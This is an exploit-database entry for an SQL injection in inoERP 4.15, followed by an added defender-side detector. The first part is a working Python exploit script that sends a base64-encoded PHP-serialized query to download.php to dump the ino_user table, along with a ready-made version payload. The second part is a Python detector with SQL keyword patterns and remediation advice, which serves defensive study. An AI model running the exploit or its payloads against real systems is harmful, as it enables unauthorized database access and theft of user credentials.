inoERP 4.15 SQL Injection

2019.09.27
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: inoERP 4.15 - 'download' SQL Injection
# Date: 2019-09-13
# Exploit Author: Semen Alexandrovich Lyhin
# Vendor Homepage: http://inoideas.org/
# Version: 4.15
# CVE: N/A

# A malicious query can be sent in base64 encoding to the unserialize() function.
# It is then deserialized as an array without any sanitization.
# After that, each element of the array is passed directly to the SQL query.

#!/bin/python
import os
import base64
import requests
import sys


def generatePayload(query):
    # THIS FUNCTION IS INSECURE BY DESIGN
    # Shells out to the local php binary to produce base64(serialize(query)).
    b64_query = base64.b64encode(query)
    return os.popen("php -r \"echo base64_encode(serialize(base64_decode('" + b64_query + "')));\"").read()


def ExecSQL(query):
    # 'ip' is the host/path pair set in __main__ below (module-level global).
    data = {"data": query, "data_type": "sql_query"}
    r = requests.post("http://" + ip + "/download.php", data=data)
    return r.content


if __name__ == "__main__":
    if len(sys.argv) != 3:
        print '(+) usage: %s <target> ' % sys.argv[0]
        print '(+) eg: %s 127.0.0.1 "ierp/" ' % sys.argv[0]
        exit()

    ip = sys.argv[1] + "/" + sys.argv[2]

    # If you don't have php, set the payload to the next one to check this SQLi
    # via the "select @@version;" payload: czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw==
    data = r"select * from ino_user;"
    print ExecSQL(generatePayload(data))
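Defender-side companion to the advisory: the following is an added Python example, not code from the exploit author or from the inoERP project. It decodes the `data` form field the way the advisory describes (base64 wrapping PHP serialize() output), parses the serialized value with a small hand-written parser for strings, integers, booleans, null and arrays, and flags requests where `data_type` is `sql_query` or a decoded array element carries an SQL keyword. The sample request bodies are constructed; the first reuses the `select @@version;` payload string quoted in the exploit's own comment. The field names `data` and `data_type` and the `download.php` endpoint are taken from the exploit; everything else (function names, the keyword list, the finding labels) is this example's own choice.

```python
import base64
import binascii
import re

# Constructed sample POST bodies for download.php, modelled on the advisory (not captured traffic).
# The first "data" value is the payload string quoted in the exploit's own comment.
SAMPLE_REQUESTS = [
    {"data": "czoxNzoic2VsZWN0IEBAdmVyc2lvbjsiOw==", "data_type": "sql_query"},
    {"data": base64.b64encode(b'a:1:{i:0;s:17:"select @@version;";}').decode(), "data_type": "sql_query"},
    {"data": base64.b64encode(b's:6:"report";').decode(), "data_type": "pdf"},
]

# SQL keywords that should never appear inside a client-supplied download descriptor.
SQL_PATTERN = re.compile(r"\b(select|insert|update|delete|union|drop)\b", re.IGNORECASE)


def parse_php_serialized(blob):
    """Minimal parser for PHP serialize() output (s:, i:, b:, N; and a:).

    Raises ValueError on anything that is not well-formed serialized data.
    """
    pos = 0

    def expect(token):
        nonlocal pos
        if not blob.startswith(token, pos):
            raise ValueError("expected %r at offset %d" % (token, pos))
        pos += len(token)

    def read_until(delim):
        nonlocal pos
        end = blob.index(delim, pos)  # ValueError if the delimiter is missing
        token = blob[pos:end]
        pos = end + 1
        return token

    def value():
        nonlocal pos
        tag = blob[pos:pos + 1]
        pos += 2  # skip the type tag and the ':' (or ';' for N)
        if tag == b"s":
            length = int(read_until(b":"))
            expect(b'"')
            text = blob[pos:pos + length]
            pos += length
            expect(b'";')
            return text.decode("utf-8", "replace")
        if tag == b"i":
            return int(read_until(b";"))
        if tag == b"b":
            return read_until(b";") == b"1"
        if tag == b"N":
            return None
        if tag == b"a":
            count = int(read_until(b":"))
            expect(b"{")
            result = {}
            for _ in range(count):
                key = value()
                result[key] = value()
            expect(b"}")
            return result
        raise ValueError("unsupported type tag %r" % tag)

    result = value()
    if pos != len(blob):
        raise ValueError("trailing bytes after serialized value")
    return result


def flatten(value):
    """Yield every string reachable inside a decoded value (arrays may be nested)."""
    if isinstance(value, dict):
        for item in value.values():
            yield from flatten(item)
    elif isinstance(value, str):
        yield value


def inspect_request(form):
    """Return a list of finding labels for one POST body (dict of form fields) to download.php."""
    findings = []
    try:
        raw = base64.b64decode(form.get("data", ""), validate=True)
        decoded = parse_php_serialized(raw)
    except (binascii.Error, ValueError):
        return findings  # not base64, or not PHP-serialized: nothing to report
    # Any client-controlled value that reaches unserialize() is a sink worth logging on its own.
    findings.append("php-serialized-data")
    if form.get("data_type") == "sql_query":
        findings.append("data_type=sql_query")
    for text in flatten(decoded):
        if SQL_PATTERN.search(text):
            findings.append("sql-keyword:" + text)
    return findings


if __name__ == "__main__":
    for req in SAMPLE_REQUESTS:
        print(req["data_type"], inspect_request(req))
```

The detector only flags; the fix on the application side is to stop passing client input to unserialize() at all (a JSON descriptor with an allowlist of permitted `data_type` values and parameterized queries removes both the deserialization sink and the string-built SQL). Note that the `data_type=sql_query` finding alone is enough to alert on, since a download endpoint has no reason to accept a raw query type from the client.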

